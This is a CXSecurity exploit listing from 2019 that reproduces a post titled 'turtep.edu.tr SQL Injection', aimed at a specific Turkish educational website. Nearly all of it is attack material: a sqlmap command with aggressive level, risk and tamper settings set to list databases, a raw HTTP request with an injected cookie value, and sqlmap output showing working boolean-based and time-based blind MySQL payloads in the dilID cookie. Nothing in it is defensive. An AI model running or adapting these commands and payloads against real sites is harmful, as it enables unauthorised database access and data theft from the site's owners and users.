turtep SQL Injection - CXSecurity.com

Vulnerability ID 1849636 Vulnerability type
Published 2019-12-06 Updated 2019-12-06
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019120025
|Details
Vulnerability details have not yet been disclosed.
|Exploit
# Exploit Title: turtep.edu.tr SQL Injection
# Date:5.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: turtep.edu.tr
# Version: ALL 
# Tested on: Windows 10-Linux Kali


c:\sqlmap\sqlmap.py -r c:\sqlmap\attack.txt --random-agent --level=3 --risk=3 --technique=BUSETQ --tamper=randomcase --timeout=10 --retries=20 --no-cast --dbs


SQL'Lİ
----------------------------
GET /index.php HTTP/1.1
Cookie: dilID=-1 or 42 %3D 40
X-Requested-With: XMLHttpRequest
Host: www.turtep.edu.tr
Accept: */*



parameter: dilID (Cookie)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: dilID=-1 or 42 = 40 OR NOT 4991=4991

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dilID=-1 or 42 = 40 AND (SELECT 3915 FROM (SELECT(SLEEP(5)))STVi)